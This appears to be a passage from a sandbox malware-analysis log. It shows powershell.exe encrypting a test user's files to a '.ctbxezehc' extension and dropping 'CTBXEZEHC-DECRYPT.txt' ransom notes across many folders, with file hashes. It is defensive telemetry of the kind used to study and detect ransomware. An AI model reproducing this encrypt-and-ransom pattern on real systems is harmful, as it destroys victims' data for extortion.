C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.ctbxezehc
binary
MD5: c164bae62343173adfc14b9bfe7eeaba
SHA256: 49997304c208abac80ce2003a962776f88f22a8a18442f4db9930078bc761396
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.ctbxezehc
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.ctbxezehc
binary
MD5: e9b4139ab1a4c0abf1b2f431b1422278
SHA256: 81ee4111a77a36dc46ce3ee85d61a0cef4d0ab05893bcaef9139305f95a04dd1
3596
powershell.exe
C:\Users\Public\Music\Sample Music\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Libraries\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\Public\Favorites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Downloads\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Music\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Pictures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Videos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\Documents\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\Public\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Saved Games\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Pictures\xmlsecure.jpg.ctbxezehc
binary
MD5: 848ad98f86c6b540164468819d58d07b
SHA256: 1a1c6bb6b1498ac56d264b65f0e859244639a3ab3e059c4bb5df9e2a35fd8bdd
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.ctbxezehc
binary
MD5: 66178a79502ff00d8b949272fd2c8512
SHA256: 71f422c732b7e0fbd2676776ae09bbb4fa53c20c9e2073125d52692a3fa9d0d8
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.ctbxezehc
binary
MD5: 386a25f77780663200cfdbe6f1867a2c
SHA256: 6877bfab103b3108fb4ac493f6f3ac25b361ad89768369da44e0d5498ec65996
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Pictures\xmlsecure.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\reportsliterature.png.ctbxezehc
binary
MD5: 6927f7ce18b9fb981e451c2920871c17
SHA256: f156960c245a4c3177e4d745e522d5f34d5fa251a78a901a004e5fe63f6981a6
3596
powershell.exe
C:\Users\admin\Pictures\particularlymedical.png.ctbxezehc
binary
MD5: 1231151810c410164cc12122a3493344
SHA256: f7e93ffdd0adf457918172df18f5385f20cbf26907ced1faff3e6bea976e150e
3596
powershell.exe
C:\Users\admin\Pictures\wartitle.png.ctbxezehc
binary
MD5: d948d25e0f9f7929371a93b80f8aeaf1
SHA256: 0fc9b44c8b2f0eab5451c9218edcbf11b5b7cf7f1c0c4786df867ffe6bd184c5
3596
powershell.exe
C:\Users\admin\Pictures\wartitle.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\reportsliterature.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\particularlymedical.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\joblists.jpg.ctbxezehc
binary
MD5: cdfbfb70dc7adc0eafc5e14ce7e549c1
SHA256: f6643503b2bd0baf1327e8a170586a705837e1a8ca1e9e8e3a15290c25eb83c3
3596
powershell.exe
C:\Users\admin\ntuser.ini.ctbxezehc
binary
MD5: 2d45fecc8c32cd1a36453d2c187c78e3
SHA256: 227210f7c8b777a19ae854576327b4d1150d0cc14004d3f269d9d14b91fe3735
3596
powershell.exe
C:\Users\admin\Pictures\modifiedsociety.png.ctbxezehc
binary
MD5: 2de698fe9802d3c088c7139994abaac0
SHA256: df444ff151b38e35f197ed96ced77341716f2c9017bf43f05fa9326da9194cf8
3596
powershell.exe
C:\Users\admin\Pictures\modifiedsociety.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Pictures\joblists.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Links\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.ctbxezehc
binary
MD5: 9cdb8d990a6504c8b9aa9b4a246c55cd
SHA256: 6ec85c6df53284cff79e75408efb5d723fd070cb1c60e64f923cab43f28d7ed4
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.ctbxezehc
binary
MD5: fcf4027ad1eaa07feee4b7056070662b
SHA256: de8ebfcfa2dd6ac21ead890c8b8e27f83eec850d385fa3fc790e97306325b38c
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.ctbxezehc
binary
MD5: a8cbea1ed108106619dea912dc4426c9
SHA256: e80102980cc006cb7dae0c65e4da24e31a9c25667fb491cbb185cbaf3fb982b0
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.ctbxezehc
binary
MD5: ae5e88af7f8b2789139ea6bbe6547e6e
SHA256: fd133cdb842e2e4225bfd7d972f96d7e3fb5be63ee63ab694c4b3767baacfa30
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.ctbxezehc
binary
MD5: 56f93ff4d0e8f37429fbdaab813f0f5b
SHA256: 5855ca9986719a1bfd31f09a636d9db5cdc451d63a3c18bf57c80907900b8a33
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.ctbxezehc
binary
MD5: 694c0c969f22d869cdc7c6f42280b8e8
SHA256: daffb886e48a395d7e7547adbd97016270a9d834205d9500b0bf7c507c8b7d26
3596
powershell.exe
C:\Users\admin\Favorites\Windows Live\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.ctbxezehc
binary
MD5: 8abf1db365bc8191c0ae5b5db1926a77
SHA256: fb5a718effee6f7aa90b08302ae042c72d03f7a6223f603c0017879ade3f86a7
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.ctbxezehc
binary
MD5: 49d526826dfd685df6e5677c4bfe24bc
SHA256: ad819349e55b4847a33486e83b869e2a3eca4b46e325a3e8e921e3befb7c43cb
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.ctbxezehc
binary
MD5: 259f8749a7d73ae015af2a413a7057c5
SHA256: 753b0c486349c3edba9bc61aba1880dec930ff30ff0cfdae68f1cc2aa6e1f7c2
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.ctbxezehc
binary
MD5: a04a524e21f09b47abb8dd1c10ea2e10
SHA256: c2584c5f970d259588b7820f0754d34c4f549667cf2874bff3d0ce3fc0f42a76
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.ctbxezehc
binary
MD5: 8ae84faccf8e037990349f22ba7ae14a
SHA256: 29bae64e5a243cd2f8d7b1c97bdb9060b3ca2e1329865b37669b89b52d51096c
3596
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.ctbxezehc
binary
MD5: 61ea8e52fd80adaa00e18d4cf6e80726
SHA256: c3c72cb098aa65cbdcf823db2632206362201a0a5ece7892437aa483d3051541
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.ctbxezehc
binary
MD5: 7f0416987e0fc54dfd9f8efd3f37975b
SHA256: aa1f7deda0701d65e2ff0c75bc3822c63c11a86dbb5d3afc145fe99bfb8128ab
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.ctbxezehc
binary
MD5: 536f1f00f1759aa39dba34ffc19aa07a
SHA256: 00e395a76f9438cf3cdfa915fcca36acfa680a386919477cc1e274e32e6ab5c4
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.ctbxezehc
binary
MD5: e0ca202e64a7215f656880913753bc84
SHA256: 2b73041667a6b37b9fa3f7b823f95922a4b00d5bacd78dadffa329178285d9f5
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.ctbxezehc
binary
MD5: 07e409b327de3c6ae1562ca74f70cc05
SHA256: f069e499c33545d33b116686ef91aba8b4ec909cfb7a30beaaef8b203f100794
3596
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Links for United States\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.ctbxezehc
binary
MD5: 63325924f67bef5952663c421892455d
SHA256: fae79ad5c3335fb0df286b11f07bbc066c7c799aae2248ad7cb3f3254add7609
3596
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.ctbxezehc
binary
MD5: 445da370c3feed207ff27ad1e6f36d7d
SHA256: 6345416dc218bb4710caafe1d96db498db7639130f8d10175a5d50d239458e71
3596
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Favorites\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Downloads\primarytree.jpg.ctbxezehc
binary
MD5: fabcb695b6962d82622910efa5d0b8fe
SHA256: 02b06f5ea9defc7005d3fb99dd9d8a1e0fbedd852add98115eeb36558fc5c084
3596
powershell.exe
C:\Users\admin\Favorites\Links\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.ctbxezehc
binary
MD5: abd92eb91c38e6f995a9d88d46cee8fc
SHA256: bf7638d49ef5accb8ff7b006c465370ce1e52cc0c20ef86d5f12ac329a4d576d
3596
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Downloads\notinvolved.jpg.ctbxezehc
binary
MD5: 2353a31ff499360745880cc730e76087
SHA256: bc14d17c9ac6fe1eebb0be5c014e47f0d22c310c5d5a1cacbd98c715ef1ddf9b
3596
powershell.exe
C:\Users\admin\Downloads\pmlives.png.ctbxezehc
binary
MD5: 8d37c4cb63e173f21e968b8603c394bc
SHA256: ea26fa1b497e93960f5d91181fee52ffe62d10635e07dd2593b71430df2f72b1
3596
powershell.exe
C:\Users\admin\Downloads\pmlives.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Downloads\notinvolved.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Downloads\primarytree.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\usefulaction.rtf.ctbxezehc
binary
MD5: 7840ca88ff27c59f61de6e814f7e0311
SHA256: 3b7bb1a6b27bc13cbbc8130753c9f0588f20a0b84a4acabbd2a1aea3d1672793
3596
powershell.exe
C:\Users\admin\Downloads\ballmanager.jpg.ctbxezehc
binary
MD5: 3ea5816535ceb93f1ee14d1e46937be2
SHA256: a1b1e3a6d74d1b0dc16fe4303f5103929644d1331afc3f12a78d60676c4547e0
3596
powershell.exe
C:\Users\admin\Downloads\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Documents\technologypaper.rtf.ctbxezehc
binary
MD5: 2a7de617eecd06d67f8dc9520d09c258
SHA256: b12fdf632e460ef65c6a5b7d90b8e50edb313cd2e8b776c056510a5253faa2c4
3596
powershell.exe
C:\Users\admin\Documents\usefulaction.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Downloads\ballmanager.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\technologypaper.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.ctbxezehc
binary
MD5: dc30642562dd0507a0928cbf3ed1d4cc
SHA256: d1fe9088b505aee38d35ba00dd516bb78339f29c617f49f0a3b9fd4fd96b152e
3596
powershell.exe
C:\Users\admin\Documents\sepsan.rtf.ctbxezehc
binary
MD5: cdc618fabb19ad3583825219c6059c70
SHA256: 58a3afe10cb7050dbdee5fd9a2f31c286f893cb0cb82dbd2a839155d7059da1a
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\sepsan.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.ctbxezehc
binary
MD5: c844cca2f0c0fcf79837ff6f61fe9ff8
SHA256: 5d54cf4b99ecf016f7f2b8e941a863dc283e08f3248cde9328bd6b7348a62977
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.ctbxezehc
fli
MD5: 3f52d2db5302361c00e478114031c737
SHA256: c5ad2762da1917998459d95cd1c0362685be854131224198be47f4db5a275946
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.ctbxezehc
binary
MD5: 85fd5409a01a3fff5c0d29567987d95f
SHA256: ad447f79e0a8d9a2e8d0ea852a29074a9e84aa2b11977a9ff5e0c61b93cd4695
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: 679462b0b23beef12e34e585aedc17ec
SHA256: 0c3e1d7ecb5c3e9fc69e135e9034b35d9d63a1b37eadd7e2da33abb398165442
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.ctbxezehc
binary
MD5: f3479a8dbee557c6aa90c6e76037b248
SHA256: 28dcc9d3e422f2ec5ed75958f091bc5839c8538a249af4065ccd17e4511d8993
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.ctbxezehc
binary
MD5: 8a60e2679f6db5fe07a6851a571d8d39
SHA256: b9a7505973319e4f8d4118c3f8379d5be877bc24b32788bbbb72109e9be6104b
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.ctbxezehc
binary
MD5: e037492c192f83474e7ff85472ff8a22
SHA256: cc881d495756c28c72fa19b0e55b5d06b94a9444d483a8d7d5a337435cb9a9ff
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Videos\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Desktop\thesestart.jpg.ctbxezehc
binary
MD5: f3bc1d7ecbbeba7b920577d14a9d0aaf
SHA256: 22406bbf3c3c307051975acfe9f397ce2c471ba7f1a3aa7d7b3d9a631d22a1e8
3596
powershell.exe
C:\Users\admin\Documents\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Music\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Pictures\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Documents\helpfulnormal.rtf.ctbxezehc
binary
MD5: 238582ca6fc8f71ca207bd737a75c621
SHA256: e115988c18b88d54daea6c0bdc49538dc5275dc7caf3e5bce01ceb8480ab4752
3596
powershell.exe
C:\Users\admin\Desktop\rulevarious.rtf.ctbxezehc
binary
MD5: a2bcb772ee9cdbc45e9819b64cf85592
SHA256: e0baf790efd416dbdb6f25cbc3c91de57e5d293ef56a2a4d40cc444292fe8458
3596
powershell.exe
C:\Users\admin\Documents\fairteam.rtf.ctbxezehc
binary
MD5: ee763c01cf566786b5f5cde5fd28c84d
SHA256: bf34e470bab563501f0b874cbee8c7215b3c885cc214cdb44c47de5e169dc701
3596
powershell.exe
C:\Users\admin\Desktop\yourselfhomepage.rtf.ctbxezehc
binary
MD5: 6e84903822427bfe10f80ee6780f8e83
SHA256: f3287aeac0817462f00398d243fb60eed9047eafde7d3aeeeb5b31a651976e84
3596
powershell.exe
C:\Users\admin\Desktop\yourselfhomepage.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\rulevarious.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\thesestart.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\helpfulnormal.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Documents\fairteam.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\pressureschools.rtf.ctbxezehc
binary
MD5: 3450490414498959902a304bd63716a6
SHA256: 501b489d9be8c562f46de2affa985758f4293b4b682d17fea2e5808c8e799388
3596
powershell.exe
C:\Users\admin\Desktop\forumfrance.rtf.ctbxezehc
binary
MD5: 7d193213abdf2c628cc5a2be5bcdb2b6
SHA256: ce027eb87bcb8b9559cf578e938acbf55f813b72146d55b6acfc20a1207b0536
3596
powershell.exe
C:\Users\admin\Desktop\pressperformance.jpg.ctbxezehc
binary
MD5: ae41eff276851adf228288696ded8f46
SHA256: 649a67ffdb84f93120df1a546ac544a23fb453a6fbb159f4ad9449e49fd0d64c
3596
powershell.exe
C:\Users\admin\Desktop\friendsbottom.jpg.ctbxezehc
binary
MD5: 6e7296274879045bf1e6185de2f10239
SHA256: a2960c645acf190040332c0a72ef4d6a8966afc9d75dc2417bdc6edebd8b7c49
3596
powershell.exe
C:\Users\admin\Desktop\pressureschools.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\pressperformance.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\friendsbottom.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\forumfrance.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\formathp.jpg.ctbxezehc
binary
MD5: c2378437b2d29f65ee714cad8dbe743f
SHA256: 4396fa9278cdffcc6cc7e9b70eec9d7f2e91183a0fb0d94758b4b2b0cce1c1e5
3596
powershell.exe
C:\Users\admin\Desktop\commercialfront.rtf.ctbxezehc
pgc
MD5: e0104540ee8c87da785508071e103bc2
SHA256: d2afcfd2d5bf7ecd4d4f6a67a242535b8ce4cdfa886db3388d468e665e6b87cc
3596
powershell.exe
C:\Users\admin\Desktop\dailyii.png.ctbxezehc
binary
MD5: fc7cf98a487034a2cd5b491f93295b03
SHA256: 6d696b256ba5cffb344a26101478d501fad5ebec0a8055b78380e32fee05b91c
3596
powershell.exe
C:\Users\admin\Desktop\costpro.rtf.ctbxezehc
binary
MD5: d46e43ecd8e30bc2b0f5e743509db6e8
SHA256: 0fe8812ba68007a256c78f3074ca007e25f833fbf52461eb75de66bfe9131148
3596
powershell.exe
C:\Users\admin\Desktop\commercialfront.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\dailyii.png
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\formathp.jpg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\costpro.rtf
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\Desktop\chineseensure.jpg.ctbxezehc
binary
MD5: 70662629097941db50be27f2621e5df3
SHA256: 47f7c575593659f804e5e0808e52bd7522d23c1519b3fbe33e599ad82d13bc7a
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\Desktop\cameraslarger.jpg.ctbxezehc
binary
